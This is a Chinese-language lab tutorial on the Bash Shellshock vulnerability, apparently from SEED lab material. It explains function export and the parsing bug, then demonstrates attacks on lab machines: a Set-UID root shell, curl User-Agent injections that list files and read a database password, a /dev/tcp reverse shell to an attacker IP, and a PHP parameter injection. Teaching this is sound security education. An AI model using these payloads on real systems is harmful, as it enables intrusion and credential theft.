Shellshock

shell函数

1. 在操作系统中，shell程序是一个命令解释器，他从终端窗口或控制台读取并执行命令，shell提供了用户和操作系统之间的接口。
2. 目前存在着许多种不同类型的shell，包括sh（Bourne shell）、bash（Bource-again shell）、csh（C shell）、zsh（Z shell）和Windows PowerShell等。
3. Bash是Linux操作系统中最受欢迎的shell程序之一，Bash中的Shellshock漏洞与内部定义的函数有关，这些函数被称为shell函数。

root@VM:~# foo(){ echo "inside function";}
root@VM:~# declare -f foo 
foo () 
{ 
    echo "inside function"
}
root@VM:~# foo
inside function
root@VM:~# unset -f foo
root@VM:~# declare -f foo 

• 上面第一个命令定义了一个shell函数。
• 一个已经定义的shell函数可以使用declare命令打印出来。
• 为了使用shell函数，只需要在命令行中输入函数名称。
• 一旦不需要某个shell函数，可以使用unset命令来删除它。

4. 将shell函数传递给子进程

• Shellshock漏洞涉及进程如何把函数传递给它的子shell进程。
  1. 直接在父shell进程中定义一个函数，并将它输出给子进程，子shell进程就可以拥有这个函数了。

  [07/05/20]seed@VM:~$ foo() { echo "hello world"; }
  [07/05/20]seed@VM:~$ export -f foo
  [07/05/20]seed@VM:~$ bash
  [07/05/20]seed@VM:~$ foo
  hello world
  

  2. 第二方式是定义一个包含特殊内容的shell变量，foo变量以一对圆括号开头，后面跟着一句由两个大括号包含的命令，对于前面这些内容来说，这些圆括号、大括号没有任何意义，它们仅仅是一个变量的内容。
  • 但是如果输出这个变量，然后再运行一个子Bash，就会发现在子shell中foo不再是一个简单的shell变量，而是变成了一个shell函数。

  [07/05/20]seed@VM:~/code$ foo='() { echo "hello world"; };'
  [07/05/20]seed@VM:~/code$ echo $foo
  () { echo "hello world"; };
  [07/05/20]seed@VM:~/code$ declare -f foo
  foo () 
  { 
      echo "hello world"
  }
  [07/05/20]seed@VM:~/code$ unset -f foo
  [07/05/20]seed@VM:~/code$ declare -f foo
  [07/05/20]seed@VM:~/code$ export foo
  [07/05/20]seed@VM:~/code$ bash_shellshock 
  [07/05/20]seed@VM:~/code$ echo $foo
  
  [07/05/20]seed@VM:~/code$ declare -f foo
  foo () 
  { 
      echo "hello world"
  }
  

  • 当一个shell变量被export命令标记时，它将作为环境变量传递给子进程。如果子进程中执行的程序又是一个Bash程序，则子进程的shell程序将环境变量转换成它自己的shell变量。在这个转换过程中，当Bash发现一个以一对圆括号开始的环境变量时，它就将该环境变量转换成一个shell函数，而非一个shell变量。

5. Shellshock漏洞

[07/05/20]seed@VM:~/code$ foo='() { echo "hello world";}; echo "extra";'
[07/05/20]seed@VM:~/code$ echo $foo
() { echo "hello world";}; echo "extra";
[07/05/20]seed@VM:~/code$ export foo
[07/05/20]seed@VM:~/code$ bash_shellshock 
extra
[07/05/20]seed@VM:~/code$ echo $foo

[07/05/20]seed@VM:~/code$ declare -f foo
foo () 
{ 
    echo "hello world"
}

• 父进程可以通过环境变量向子进程shell传递函数定义，当子进程的Bash将环境变量转换成函数时，Bash应当将变量中的指令解析出来，而不是执行它们。
• 定义一个shell变量foo，用一个看上去函数定义的字符串作为变量foo的值，并且在结尾的大括号后面添加一个额外的命令echo，用export命令标记该shell变量，这样它会作为环境变量传递给子进程，当一个子进程的Bash被创建时，子shell将会解析该环境变量，把它转换为子函数定义，在解析过程中，由于Shellshock漏洞，Bash将执行大括号后面的额外命令。

6. Bash源代码中的错误

if（privmode==0 && read_but_dont_execute ==0 && STREQN("() {",string,4){
...
parse_and_excute(temp_string,name,SEVAL_NONINT|SEVAL_NOHIST);
}

• Bash检查环境变量是否以"(){"开头，以确定是否需要把它转换为函数，一旦发现这样的字符串，Bash将“=”替换成空格从而将环境变量变成一个函数定义，生产下面的字符串：

foo(){echo "hello world";};echo "extre";

• 然后Bash调用parse_and_execute()函数来解析函数定义，然而parse_and_execute()函数的功能太过强大，它不仅仅解析函数定义，还可以解析和运行其他的shell指令。如果字符串只是一个函数定义，该函数只会解析它而不会执行它，但如果该字符串包含用分号（；）隔开的多个shell命令，则parse_and_execute()函数会解析和运行每一条命令。

7. Shellshock漏洞的利用

• 必须满足两个条件：
  1. 目标进程必须运行Bash
  2. 攻击者只能通过环境变量把攻击数据传给目标进程，如果不是这样的话，Shellshock漏洞则不会被激发。

利用ShellShock攻击Set-UID程序

1. 当一个root用户的Set-UID程序通过system()函数执行/bin/ls程序时，将会启动一个Bash进程，攻击者设计的环境变量将导致非授权的命令以root权限被执行。
2. 准备有漏洞的程序

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

void main()
{
        setuid(geteuid());
        system("/bin/ls -l");
}

• system()函数来执行来执行/bin/ls命令，system()函数实际上会使用fork()函数来创建子进程，然后使用execl()函数执行/bin/sh程序，最终请求shell程序执行/bin/ls。
• 在Ubuntu16.04中，/bin/sh指向的是/bin/dash，因此system()函数只会调用/bin/dash，而这个程序是没有Shellshock漏洞的，因此需要修改链接，让/bin/sh指向有漏洞的bash_shellshock程序。

sudo ln -sf /bin/bash_shellshock /bin/sh

• setuid(seteuid())函数把真是用户ID变为和有效用户ID一致，因为如果真实用户ID和有效用户ID不一致的话，Bash不会处理从环境变量处获得函数定义，因此不会受到Shellshock攻击。

3. 编译并设置程序为root用户的Set-UID程序。

[07/05/20]seed@VM:~/codegcc -o vul vul.c
[07/05/20]seed@VM:~/codesudo chown root vul
[07/05/20]seed@VM:~/codesudo chmod 4755 vul
[07/05/20]seed@VM:~/code$ ./vul
total 12
-rwsr-xr-x 1 root seed 7420 Jul  5 07:40 vul
-rw-rw-r-- 1 seed seed  119 Jul  5 07:40 vul.c

4. 基于Shellshock漏洞，可以构造一个函数声明，并将所选命令(/bin/sh)放在声明的最后，然后输出(export),再运行程序。

• 在这里需要注意shell函数声明内部的空格缩进，否则易发生错误。

[07/05/20]seed@VM:~/code$ export foo='() { echo hello; }; /bin/sh'
[07/05/20]seed@VM:~/code$ ./vul
sh-4.2# 

• 当运行Set-UID程序时（vul）时，shell变量会变成子进程的环境变量，由于system()函数的原因，Bash会被调用，它检测到环境变量foo中存放一个函数声明，因此会解析该声明。
• 由于解析逻辑中的漏洞，它最终会执行放在末尾的/bin/sh,可以看到在运行后，出现了一个#号提示符就说明我们已经获取到了root权限的shell。

利用Shellshock攻击CGI程序

1. 通用网关接口（CGI）被Web服务器用来生成动态网页的可执行程序，许多CGI程序时shell脚本，如果程序使用了Bash，那么它可能成为Shellshock的攻击目标。
2. 该实验需要准备两台虚拟机：一个时攻击者，一个是目标服务器。

• 首先用Bash脚本编写一个简单的CGI程序，它的作用仅仅是打印出“Hello World”。
• 在CGI程序中使用有漏洞的bash_shellshock

#!/bin/bash_shellshock

echo "Content-type: text/plain"
echo
echo
echo "Hello World"

• 然后需要将该CGI程序放到目标服务器的/usr/lib/cgi-bin目录中，并将它的权限设置为775，该目录是Apache服务器的默认CGI目录。

seed@VM:/usr/lib/cgi-bin# sudo chmod 775 test.cgi 

• 为了从攻击者的机器上访问该CGI程序，有两种方法：
  1. 在浏览器中输入：

  http://192.168.137.128/cgi-bin/test.cgi
  

  2. 使用一个名为curl的程序，该程序是用来发送HTTP请求的命令行攻击：

  C:\Users\12586>curl http://192.168.137.128/cgi-bin/test.cgi
  Hello World
  

3. Web服务器如何调用CGI程序
   1. 当用户向Apache服务器发送CGI请求时，Apache服务器会检查该请求，如果是一个CGI请求，Apache服务器会用fork()函数来新建一个进程，然后使用exec()函数族中的某个函数在新进程中执行CGI程序。
   2. 因为CGI程序以"#!/bin/bash_shellshock"开头，因此该程序是一个shell脚本，exec()函数实际上执行的是/bin/bash_shellshock,Bash会运行shell脚本。
   3. 出发Bash只是ShellShock攻击成功的条件之一，另一个重要的条件是攻击者必须通过环境变量为Bash程序提供输入。
   • 修改test.cgi程序如下：

   #!/bin/bash_shellshock
   
   echo "Content-type: text/plain"
   echo
   echo
   echo "Environment Variables"
   strings /proc/$$/environ
   

   • 最后一行指令"strings /proc/$/environ"能打印出一个进程的所有环境变量，Bash会将$替换成当前进程的ID。
   • 然后，通过curl来访问该CGI程序，使用-v选项，curl会打印出HTTP请求和来自服务器的响应。

   C:\Users\12586> curl -v http://192.168.137.128/cgi-bin/test.cgi
   *   Trying 192.168.137.128...
   * Connected to 192.168.137.128 (192.168.137.128) port 80 (#0)
   > GET /cgi-bin/test.cgi HTTP/1.1
   > Host: 192.168.137.128
   > User-Agent: curl/7.47.0
   > Accept: */*
   > 
   < HTTP/1.1 200 OK
   < Date: Sun, 05 Jul 2020 13:44:00 GMT
   < Server: Apache/2.4.18 (Ubuntu)
   < Vary: Accept-Encoding
   < Transfer-Encoding: chunked
   < Content-Type: text/plain
   < 
   Environment Variables
   HTTP_HOST=192.168.137.128
   HTTP_USER_AGENT=curl/7.47.0
   HTTP_ACCEPT=*/*
   PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
   ....
   

   • CGI程序打印出CGI进程的所有环境变量，其中一个环境变量HTTP_USER_AGENT，它的值和请求中的Uset-Agent完全一样，因此可以知道，Apache服务器从HTTP请求头中获得User-Agent信息，并将它赋值给一个名为HTTP_USER_AGENT的环境变量。
   • 当Apache服务器创建一个子进程来执行CGI程序时，它会传递该变量以及其他一些环境变量给CGI程序。
   • 使用命令行工具curl，该命令"-A"选项可以用来设置请求的User-Agent字段。

   C:\Users\12586>curl -A "test" -v http://192.168.137.128/cgi-bin/test.cgi
   *   Trying 192.168.137.128...
   * TCP_NODELAY set
   * Connected to 192.168.137.128 (192.168.137.128) port 80 (#0)
   > GET /cgi-bin/test.cgi HTTP/1.1
   > Host: 192.168.137.128
   > User-Agent: test
   > Accept: */*
   >
   < HTTP/1.1 200 OK
   < Date: Sun, 05 Jul 2020 13:53:53 GMT
   < Server: Apache/2.4.18 (Ubuntu)
   < Vary: Accept-Encoding
   < Transfer-Encoding: chunked
   < Content-Type: text/plain
   <
   
   Environment Variables
   HTTP_HOST=192.168.137.128
   HTTP_USER_AGENT=test
   ...
   

   • 可以看HTTP请求的User-Agent字段被设置为"test",HTTP_USER_AGENT环境变量也获得了一样的内容。
4. 实施Shellshock攻击
   1. 获取服务器目录信息
   • 攻击者需要做的是为了User-Agent字段构造一个字符串，以触发Bash中的错误解析逻辑，目标是让CGI程序执行选择的命令。
   • 首先尝试一个/bin/ls指令，看能否获取服务器某个目录中的内容，在这个命令之前，还需要指定Apache返回数据的类型，因为Apache会受到CGI程序打印出的任何内容，因此可以通过Content-type: text/plain来告诉Apache服务器数据的类型。

   C:\Users\12586>curl -A "() { echo hello; }; echo Content-type: text/plain; echo; /bin/ls -l"  http://192.168.137.128/cgi-bin/test.cgi
   total 4
   -rwxrwxr-x 1 seed seed 121 Jul  5 09:43 test.cgi
   

   • 从运行结果来看，/bin/ls命令得到了执行。
   • 在Ubuntu中，Web服务器以www-data用户ID运行，这使得程序的权限非常有限，利用该权限不能控制服务器，但却能造成一些破坏。
   2. 盗取密码
   • 当一个Web应用连接后台数据库（MySQL时），它需要提供登录密码，这些密码通常是直接写在程序中的，或者存储在配置文件中，远程用户无法读取这些密码，但是如果让服务器运行指令，就可以获得这些密码。
   • Ubuntu虚拟机中的Web服务器运行了几个Web应用，它们中的大多数都是使用数据库的，可以从下面这个文件获得密码：/var/www/CSRF/Elgg/elgg-config/settings.php,一旦获得了密码，就可以直接登录到数据库，盗取或者改动信息。

   	C:\Users\12586>curl -A "() { echo hello; }; echo Content-type: text/plain; echo; /bin/cat /var/www/CSRF/Elgg/elgg-config/settings.php"  http://192.168.137.128/cgi-bin/test.cgi
   <?php
   
   date_default_timezone_set('UTC');
   global $CONFIG;
   if (!isset($CONFIG)) {
           $CONFIG = new \stdClass;
   }
   $CONFIG->dbuser = 'elgg_admin';
   
   /**
    * The database password
    *
    * @global string $CONFIG->dbpass
    */
   $CONFIG->dbpass = 'seedubuntu';
   

   3. 创建反向shell
   • 通过shellshock漏洞在服务器中运行的最理想的命令时shell程序，因为shell程序允许用户输入任何命令，如果将/bin/bash放在Shellshock攻击中,Bash的确会在服务器端被执行，但是却无法控制它，不能给他提供命令，也无法看到它的输出。
   • 反向Shell是让程序把它的输入和输出都交由远程计算机的用户控制，一般在受害者的机器中运行该Shell，从攻击者的机器中接受输入，同时也将输出发送到攻击者的机器中，反向shell为攻击者提供了一种在已被攻破的机器中运行命令的便捷方法。
   • 攻击者可以使用netcat命令来运行一个TCP服务器，该服务器能够答应出客户端发来的所有信息，并向客户端发送用户在本地服务器中输入的信息。

   nc -lv 9090
   

   • 上述nc命令会阻塞等待并连接，现在服务器上直接运行下面的Bash程序：

   /bin/bash -i > /dev/tcp/192.168.137.129/9090 0<&1 2>&1
   

   • 该命令实在被攻破的服务器上执行的命令：
     • /bin/bash -i意味着使用shell的可交互模式，shell在这个模式下会提供提示符。
     • /dev/tcp/192.168.137.129/9090，使得shell的输出设备被重定向至TCP连接，连接到192.168.137.129的9090端口，在UNIX系统中，stdout的文件描述符是1.
     • 0<&1：文件描述符0代表标准输入设备，这个选项告诉系统将标准输出设备也用作标准输入设备。由于标准输出已经重定向到TCP连接，因此Shell程序会从同一个TCP连接获得输入。TCP连接是一个双向设备，既可以往里面写数据，也可以从中读取数据。
     • 2>&1：文件描述符2代表标准错误，这是错误也被重定向到TCP连接。
   • 总结：/bin/bash -i > /dev/tcp/192.168.137.129/9090 0<&1 2>&1在服务器上开启一个Bash shell,他的输入来自TCP连接，输出又被传给同一个TCP连接。
   • 回到攻击者的计算机可以看到反向shell创建成功：

   Attacker@VM:/$ nc -lv 9090
   Listening on [0.0.0.0] (family 0, port 9090)
   Connection from [192.168.137.128] port 9090 [tcp/*] accepted (family 2, sport 47964)
   [07/05/20]seed@VM:~$ 
   

   • 在Shellshock攻击中创建反向Shell
     1. 攻击者先运行

     	Attacker@VM:/$ nc -lv 9090
     

     2. 然后再启动一个控制台运行下面给命令向目标服务器的CGI发起恶意请求：

     	Attacker@VM:/$ curl -A "() { echo hello; }; echo Content-type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/192.168.137.129/9090 0<&1 2>&1" 	http://192.168.137.128/cgi-bin/test.cgi
     

     3.从结果来看，一旦curl指令被执行，攻击指令也会再服务器上被运行，这将导致CGI程序触发一个Bash shell，该Bash shell会链接到192.168.137.129的9090端口，也就是攻击者的计算机，攻击者的nc程序会接受这个连接，并显示由远端服务器的CGI触发的Bash程序送来的Shell提示符，这表反向Shell成功了。

     Attacker@VM:/$ nc -lv 9090
     Listening on [0.0.0.0] (family 0, port 9090)
     Connection from [192.168.137.128] port 9090 [tcp/*] accepted (family 2, sport 47966)
     bash: cannot set terminal process group (2389): Inappropriate ioctl for device
     bash: no job control in this shell
     www-data@VM:/usr/lib/cgi-bin$ id
     id
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
     

     4. 结果表明，可以服务器上以www-data身份运行任何命令了，虽然不是一个特殊用户。

针对PHP的远程攻击

1. 对于shellshock的漏洞，php满足两个条件：
   • Php有system()函数可以用来执行外部命令。
   • 用户数据需要被作为环境变量传入给PHP程序，因此程序调用system()函数时，环境变量被进一步传递给运行的Bash程序。
2. 再Apach服务器中，PHP可以通过三种方式运行：Apache组件、CGI和Fast CGI。以CGI运行PHP会与之前例子有相同的效果，但是以Fast CGI和Apache组件运行，从Apache服务器获得的数据无法通过环境变量交给PHP程序。
3. 如果再调用system()之前，PHP程序根据用户的输入设置了环境变量，那么它还是存在Shellshock漏洞的。

<?php
function getParam()
{
        $arg = NULL;
        if(isset($_GET["arg"]) && !empty($_GET["arg"]))
        {
                $arg = $_GET["arg"];
        }
        return $arg;
}
$arg = getParam();
putenv("ARG=$arg");
system("strings /proc/$$/environ | grep ARG");
?>

• 将该文件放到/var/www/html目录下，修改文件权限为775.
• 通过攻击者的计算机执行如下指令：

Attacker@VM:/$ curl http://192.168.137.128/test.php?arg="()%20%7B%20echo%20hello;%20%7D;%20/bin/cat%20/var/www/secret.txt"
THIS IS SECRET

• 对于arg参数来说，除了包含一个shell函数定义外，还加上额外的命令，该命令是"arg=() { echo hello;}; /bin/cat /var/www/secret.txt"的URL编码，该命令的目的是读取secret.txt文件的内容，当system()函数开启shell程序解析环境变量时，在shell函数定义末尾的额外指令将被执行。